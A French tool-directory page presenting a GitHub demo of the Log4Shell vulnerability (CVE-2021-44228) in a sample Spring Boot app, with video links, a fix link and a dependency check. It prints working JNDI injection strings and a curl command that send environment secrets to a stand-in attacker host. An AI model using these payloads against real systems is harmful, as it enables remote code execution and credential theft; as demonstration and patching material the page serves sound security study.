Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j-vulnerability — Log4Shell (CVE-2021-44228) est une vulnérabilité zero-day dans Log4j | Kitploit
Outils/GitHubGitHub/mazhar-hassan/log4j-vulnerability
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubmazhar-hassan/log4j-vulnerability

log4j-vulnerability

Log4Shell (CVE-2021-44228) est une vulnérabilité zero-day dans Log4j

Voir le dépôt
2il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4Shell (CVE-2021-44228) est une vulnérabilité zero-day dans Log4j

Vulnérabilité Log4J

Découverte : 24 novembre 2021

Correctif : 6 décembre 2021

Démonstration de l'attaque

Cliquez ci-dessous pour la vidéo YouTube

ATTACK DEMO

Application d'exemple

Cette application d'exemple est une application Spring Boot qui utilise log4j comme framework de journalisation et s'exécute avec les variables d'environnement suivantes sur le port 8080 en localhost.

Regardez l'explication en vidéo :

https://youtu.be/bb6pgWrm7tA

Variables d'environnement

key=jason.bourne;secret=Treadstone

Attaque

POST http://localhost:8080//v1/public/log-test

Paramètre :

value=${jndi:ldap://some-random-hacking-site.com}

Attaque depuis le client

Obtenir les variables d'environnement

En utilisant la chaîne suivante, vous pouvez obtenir les variables d'environnement value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}

Commande curl

curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'

Console de journalisation

2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect] at com.sun.jndi.ldap.Connection.<init>(Connection.java:243) at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)

Correctif

https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot

Confirmation

mvn dependency:tree Assurez-vous qu'aucun des JAR dépendants ne pointe vers une version vulnérable de log4j.

Playlist sécurité Techflix Youtube

https://www.youtube.com/watch?v=bb6pgWrm7tA&list=PLLqjNYIgOqeQl6NaeIeUhvNcWdpOVNkRi&index=1

Télécharger l’outil